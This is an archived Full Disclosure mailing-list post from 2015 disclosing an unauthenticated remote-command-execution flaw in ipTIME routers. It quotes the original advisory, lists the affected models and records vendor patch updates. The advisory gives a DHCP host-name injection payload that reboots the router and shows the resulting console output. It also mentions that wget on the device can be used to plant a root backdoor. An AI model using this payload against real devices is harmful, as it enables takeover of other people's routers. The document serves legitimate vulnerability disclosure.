[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CADxEXOhFn4WzH8+EbtyH=K7tGHbGoD+7ghy1-HTu8+LB=Be=dg@mail.gmail.com>
Date: Mon, 27 Jul 2015 08:01:45 +0900
From: Pierre Kim <pierre.kim.sec@...il.com>
To: bugtraq@...urityfocus.com, fulldisclosure <fulldisclosure@...lists.org>
Subject: Re: [FD] 127 ipTIME router models vulnerable to an unauthenticated
RCE by sending a crafted DHCP request
Update on this case:
1) ipTIME responded to CNET Korea about the DHCP RCE on 2015-07-22:
http://www.cnet.co.kr/view/100140730
2) ipTIME released the 9.78 firmwares for 116 routers and finally
credited my work. 172 routers are affected in total and 9.72 firmwares
will be released soon for all the router models to patch the security
problem.
References:
ipTIME N604plus/N604R 외 15종 펌웨어 9.72 배포 -
http://iptime.com/iptime/?page_id=16&uid=16563&mod=document
ipTIME N702BCM/N704BCM외 7종 펌웨어 9.72배포 -
http://iptime.com/iptime/?page_id=16&uid=16572&mod=document
ipTIME A5004NS 외 5종 펌웨어 9.72 배포 -
http://iptime.com/iptime/?page_id=16&uid=16582&mod=document
ipTIME A2004NS/A604 외 70 종 펌웨어 9.72 배포 -
http://iptime.com/iptime/?page_id=16&uid=16609&mod=document
ipTIME 구형 제품군 15종 펌웨어 9.72 배포 -
http://iptime.com/iptime/?page_id=16&uid=16678&mod=document
Regards,
On 7/6/15, Pierre Kim <pierre.kim.sec@...il.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
>
> ## Advisory Information
>
> Title: 127 ipTIME router models vulnerable to an unauthenticated RCE
> by sending a crafted DHCP request
> Advisory URL: https://pierrekim.github.io/advisories/2015-iptime-0x02.txt
> Blog URL:
> https://pierrekim.github.io/blog/2015-07-06-127-iptime-router-models-unauthenticated-RCE-with-DHCP.html
> Date published: 2015-07-06
> Vendors contacted: None
> Release mode: Released, 0day
> CVE: no current CVE
>
>
>
> ## Product Description
>
> EFMNetworks ipTIME is the largest Korean brand of SOHO/small/middle
> entreprise Routers/WiFi APs/Modems/Firewalls in South Korea
> with millions of devices deployed in the country. EFMNetworks ipTIME
> is occupying more than 60 percent of personal network devices.
> There are =~ 10 000 000 of ipTIME devices deployed in South Korea.
>
>
>
> ## Vulnerability Summary
>
> This vulnerability allows to bypass the admin authentication and to
> get a direct RCE from the LAN side with a single DHCP request.
>
> This is a direct RCE against the routers which gives a complete root
> access to the embedded Linux from the LAN side.
>
> It affects 127 ipTIME products from 2009-era firmwares to the current
> firwmare (9.66, built time 2015-06-11) with the default configuration:
>
>
> - ipTIME a1004
> - ipTIME a1004v
> - ipTIME a104
> - ipTIME a104ns
> - ipTIME a104r
> - ipTIME a2004
> - ipTIME a2004ns
> - ipTIME a2004r
> - ipTIME a2008
> - ipTIME a3004
> - ipTIME a3004ns
> - ipTIME a5004ns
> - ipTIME a604
> - ipTIME a604v
> - ipTIME extac
> - ipTIME extd2
> - ipTIME g1
> - ipTIME g104
> - ipTIME g104a
> - ipTIME g104be
> - ipTIME g104i
> - ipTIME g104m
> - ipTIME g204
> - ipTIME g501
> - ipTIME g504
> - ipTIME ipsmart
> - ipTIME mini
> - ipTIME mobap1
> - ipTIME multi
> - ipTIME n1
> - ipTIME n104
> - ipTIME n104a
> - ipTIME n104ar1
> - ipTIME n104i
> - ipTIME n104k
> - ipTIME n104ktt
> - ipTIME n104m
> - ipTIME n104p
> - ipTIME n104q
> - ipTIME n104r
> - ipTIME n104r3
> - ipTIME n104rsk
> - ipTIME n104s
> - ipTIME n104sr1
> - ipTIME n104t
> - ipTIME n104v
> - ipTIME n104vlg
> - ipTIME n1e
> - ipTIME n1eky
> - ipTIME n1p
> - ipTIME n2
> - ipTIME n2e
> - ipTIME n2p
> - ipTIME n3004
> - ipTIME n5
> - ipTIME n5004
> - ipTIME n504
> - ipTIME n5r1
> - ipTIME n6004
> - ipTIME n6004m
> - ipTIME n6004r
> - ipTIME n604
> - ipTIME n604a
> - ipTIME n604i
> - ipTIME n604m
> - ipTIME n604p
> - ipTIME n604r
> - ipTIME n604s
> - ipTIME n604t
> - ipTIME n604v
> - ipTIME n604vlg
> - ipTIME n608
> - ipTIME n7004ns
> - ipTIME n702bcm
> - ipTIME n704
> - ipTIME n704a
> - ipTIME n704a3
> - ipTIME n704bcm
> - ipTIME n704lg
> - ipTIME n704m
> - ipTIME n704mlg
> - ipTIME n704ns
> - ipTIME n704s
> - ipTIME n704v
> - ipTIME n704v3
> - ipTIME n8004
> - ipTIME n8004r
> - ipTIME n8004v
> - ipTIME n804
> - ipTIME n804a
> - ipTIME n804a3
> - ipTIME n804t
> - ipTIME n804t3
> - ipTIME n804v
> - ipTIME n904
> - ipTIME n904ns
> - ipTIME n904v
> - ipTIME ng104
> - ipTIME ng304
> - ipTIME ntq104
> - ipTIME ntv108
> - ipTIME ntv116
> - ipTIME ntv124
> - ipTIME q1
> - ipTIME q304
> - ipTIME q504
> - ipTIME q604
> - ipTIME t1004
> - ipTIME t1008
> - ipTIME t16000
> - ipTIME t2008
> - ipTIME t24000
> - ipTIME t3004
> - ipTIME t3008
> - ipTIME timeve
> - ipTIME tq204
> - ipTIME tv104
> - ipTIME v1016
> - ipTIME v1024
> - ipTIME v304
> - ipTIME v308
> - ipTIME v504
> - ipTIME wre1
> - ipTIME x3003
> - ipTIME x3007
> - ipTIME x5007
> - ipTIME x6003
>
>
> The probability that firmware 9.68 (last firmware for these specific
> models) running in the below products is vulnerable is VERY high:
>
>
> - ipTIME q304
> - ipTIME q1
> - ipTIME q504
> - ipTIME ew302
> - ipTIME n702bcm
> - ipTIME a3004ns
> - ipTIME a5004ns
>
>
> Concerning the high CVSS score (10/10) of the vulnerability, the
> number of affected devices and the longevity of this vulnerability (6+
> year old),
> the ipTIME users are urged to contact ipTIME.
>
>
>
> ## Details
>
> This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD
> server in ipTIME devices allows remote attackers to execute arbitrary
> commands
> via shell metacharacters in the host-name field.
>
> Sending a DHCP request with this parameter will reboot the device:
>
> cat /etc/dhcp/dhclient.conf
>
> send host-name ";/sbin/reboot";
>
> When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we
> will see the stdout of the /dev/console device;
> the dhcp request will immediately force the reboot of the remote device:
>
>
> Booting...
>
> @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
> @
> @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
> @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
> @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
> @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
> @
> @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
>
> [...]
> WiFi Simple Config v1.12 (2009.07.31-11:35+0000).
>
> Launch iwcontrol: wlan0
> Reaped 317
> iwcontrol RUN OK
> SIGNAL -> Config Update signal progress
> killall: pppoe-relay: no process killed
> SIGNAL -> WAN ip changed
> WAN0 IP: 192.168.2.1
> signalling START
> Invalid upnpd exit
> killall: upnpd: no process killed
> upnpd Restart 1
> iptables: Bad rule (does a matching rule exist in that chain?)
> Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
> Update Session timestamp and try it after 5 seconds again.
> ez_ipupdate callback --> time_elapsed: 0
> Run DDNS by IP change: / 192.168.2.1
> Reaped 352
> iptables: Bad rule (does a matching rule exist in that chain?)
> Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file
> Jan 1 00:00:25 miniupnpd[370]: could not open lease file:
> /var/run/upnp_pmlist
> Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
> Reaped 363
> Led Silent Callback
> Turn ON All LED
> Dynamic Channel Search for wlan0 is OFF
> start_signal => plantynet_sync
> Do start_signal => plantynet_sync
> SIGNAL -> Config Update signal progress
> killall: pppoe-relay: no process killed
> SIGNAL -> WAN ip changed
> Reaped 354
> iptables: Bad rule (does a matching rule exist in that chain?)
> ez_ipupdate callback --> time_elapsed: 1
> Run DDNS by IP change: / 192.168.2.1
> Burst DDNS Registration is denied: iptime -> now:26
> Led Silent Callback
> Turn ON All LED
> /proc/sys/net/ipv4/tcp_syn_retries: cannot create
> - ---> Plantynet Event : 00000003
> - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE
>
>
> [sending the DHCP request]
>
>
> [01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1
> 00:01:03 miniupnpd[370]: received signal 15, good-bye
> Reaped 392
> Reaped 318
> Reaped 314
> Reaped 290
> Reaped 288
> Reaped 268
> Reaped 370
> Reaped 367
> - ---> PLANTYNET_SYNC_FREE_DEVICE
> Restarting system.
>
> Booting...
>
> @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
> @
> @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
> @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
> @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
> @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
> @
> @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
> Reboot Result from Watchdog Timeout!
>
> - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
> Delay 1 second till reset button
> Magic Number: raw_nv 00000000
> Check Firmware(05020000) : size: 0x001ddfc8 ---->
>
>
> [...]
>
>
>
>
> An attacker can use the /usr/bin/wget binary located in the file
> system of the remote device to plant a backdoor and then execute it as
> root.
>
> - From my tests, it is possible to use this vulnerability to overwrite
> the firmware with a custom (backdoored) firmware.
>
>
>
> ## Vendor Response
>
> - From my experience, contacting EFMNetworks ipTIME proved to be useless.
> They don't publish security information in the changelog, they don't
> answer to security researchers and
> they don't credit them either.
> EFMNetworks ipTIME was not contacted in regard of this case.
>
>
>
> ## Report Timeline
>
> * Jun 02, 2014: Vulnerability found by Pierre Kim.
> * Apr 07, 2015: Vulnerabilities confirmed with reliable PoCs.
> * Jun 25, 2015: Vulnerability confirmed on all the existing versions
> from 2009 to 2015 including the last firmware version (9.66).
> * Jul 06, 2015: A public advisory is sent to security mailing lists.
>
>
>
> ## Credit
>
> This vulnerability was found by Pierre Kim (@PierreKimSec).
>
>
>
> ## References
>
> https://pierrekim.github.io/advisories/2015-iptime-0x02.txt
>
>
>
> ## Disclaimer
>
> This advisory is licensed under a Creative Commons Attribution
> Non-Commercial
> Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
>
> iQIcBAEBCgAGBQJVmcxDAAoJEMQ+Dtp9ky28/vgP/RexWVHpSEIxER8l/JbShcuC
> mUKpgvxFzLNqFbqXRrf1obB7DhJ2H1q1e1Nq/w02QZDBnhN3A6e52cBFNw7SLQ9V
> zuoNX3o/we9LkPN1rQsQniPiPp3GqtzgE8+mXzyWSgGBrk+9xa3Wymn3Z1VlZjUy
> L+gmfYIgyv7RRnAOqZn8k2eJOFdrytp4I7RlGP9eBUas8M+Sd0Y9cFmF9OsaAJtC
> SrerzyAt1onlNpeiMGWqI6hyqK/Fh2JSDzeYrYMZVjUgR/ffaLS+7WQSjByunCR5
> XlpsgxGKqpqrpOd6IVdE9YMKS2/zi9oiEd3fRIxNHGZ+yjGHThK562lhLgm+aeMf
> nRDMJaby4qvhztChktT8z0ie0C/3xW6I1K2VlEi+89Z5N6951TsZcFgUq65mLi7l
> x0s3Q9BblZ21+W5nD3dJlK+F+NX6s0+MzAv44r4lAP4nuJ5k0zHw7LIHQ09boZX2
> +4zJa1vZjFgsVCC0QgVdbpR3pPn9MSwsPiMOcqwZZALrJpQRljNm7+A/fKO9kDUx
> z7MZVnoY2090EpspCrE3wA6AGYdrzVg3tc9U90hc+kdMRTR0cOpK5TDf9ArN6Bok
> kTPhnpOftrEVYOA1JLeOvSPNFLYK193niQE46TrTlQMUVKsummhtTJY8oe+rtQMf
> WHjFp48VR2JM+PMRW0BR
> =c35o
> -----END PGP SIGNATURE-----
>
>
> More vulnerabilities regarding ipTIME products are likely to be released
> soon.
>
> Regards,
>
>
>
> --
> Pierre Kim
> pierre.kim.sec@...il.com
> @PierreKimSec
> https://pierrekim.github.io/
>
--
Pierre Kim
pierre.kim.sec@...il.com
@PierreKimSec
https://pierrekim.github.io/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists